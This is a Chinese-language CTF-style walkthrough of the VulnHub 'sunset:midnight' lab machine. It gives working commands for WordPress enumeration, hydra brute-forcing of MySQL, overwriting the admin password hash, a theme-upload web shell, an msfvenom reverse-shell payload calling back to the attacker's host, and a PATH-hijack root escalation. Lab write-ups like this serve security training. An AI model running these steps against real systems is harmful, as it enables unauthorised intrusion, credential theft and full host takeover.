目标主机:192.168.12.211
操作机(kali):192.168.70.128
首先对目标主机进行端口探测,发现存在22、80、3306等端口信息。
然后直接访问80端口http://192.168.12.211/,跳转到http://sunset-midnight/域名地址,所以直接对host文件进行了配置后使用域名直接进行访问。
发现看见web服务的网站页面以后,发现其实就是一个WordPress的站点。
然后我们尝试使用wpscan对当前站点进行扫描:wpscan --url http://sunset-midnight/,在扫描中发现了一些网站网站路径等相关信息
查看一下当前服务的一些指纹信息,根据WordPress的版本信息搜索了一下当前版本存在的一些漏洞信息,然而发现检索的漏洞在当前版本中并不可用。
我们并同步对WordPress的用户进行枚举扫描:wpscan --url http://sunset-midnight --enumerate u,我们获取到admin用户是存在的
然后我们再对获取到的admin用户尝试进行密码爆破攻击:wpscan --url http://sunset-midnight/ -P password.txt -U admin
然而我们并没用成功爆破出密码
后来直接尝试对数据库进行爆破攻击:hydra 192.168.12.211 mysql -l root -P password.txt
成功爆破出了mysql数据库的用户密码:[3306][mysql] host: 192.168.12.211 login: root password: robert
接下来直接使用了kali远程连接数据库进行操作:mysql -u root -p -h sunset-midnight
成功连接了数据库后我们直接操作数据库修改当前WordPress中admin用户的密码信息:
show databases; #查看数据库信息
use wordpress; #定位切换数据库
select userpass from wpusers; #查询当前网站用户密码信息
我们看见数据库用户表中其实只有一条用户数据信息,所以我们直接这条数据的密码进行修改
我们将覆盖的密码数据是我们自己想要设置的一个密码进行MD5加密:
update wpusers SET userpass="76a2173be6393254e72ffa4d6df1030a" where id=1; #使用passwd进行MD5加密后去修改之前的密码信息
可以看到我们的密码直接修改成功,然后我们就使用我们修改后的密码直接登陆WordPress后台进行getshell操作。
通过上传主题文件来getshell 首先先去官网下载一个主题压缩包,之后将执行代码和系统命令的源码写入shell.php中,然后将其放入压缩包一起上传
之后访问/wp-content/themes/[主题名]/[shell文件名]即可得到一个shell,成功获取了系统权限
然后我们尝试进行shell反弹,使用nc监听非常不稳定,根本无法进行shell连接,尝试使用msf生成getshell的木马文件进行反弹shell:
所以下面使用msfvenom生成shell.php,msf进行监听获得shell
访问appearance->add new ->upload theme进行上传
msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.12.128 LPORT=7777 R > getshell.php
访问请求shell文件,代码执行后shell获取成功
直接进入shell功能,对主机进行信息收集
我们通过翻阅了网站的数据库连接文件获取了数据库连接的账号jose和密码
然后我们又在系统用户信息中发现存在一个用户与网站数据库连接用户jose相对应
然后我们尝试使用数据库连接用户的密码切换到jose用户,直接成功切入。使用 sudo-l
查看当前权限,发现jose不能使用sudo。
查看SUDI权限的文件:find / -perm -u=s -type f 2>/dev/null
由于不能使用sudo命令,所以大多数命令都不能进行提权,但是发现存在一个status命令,并不太常见,执行一下
从上面可以看到status使用了service命令,但是为未使用service的绝对路径,所以可以尝试更改$PATH来执行该文件
cd /tmp
echo "/bin/bash" > service
chmod 777 service
echo $PATH
export PATH=/tmp:$PATH #将/tmp添加到环境变量中
status
再次执行之后便成功获得了root权限
原文始发于微信公众号(陆吾安全攻防实验室):vulnhub靶机-sunset:midnight
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论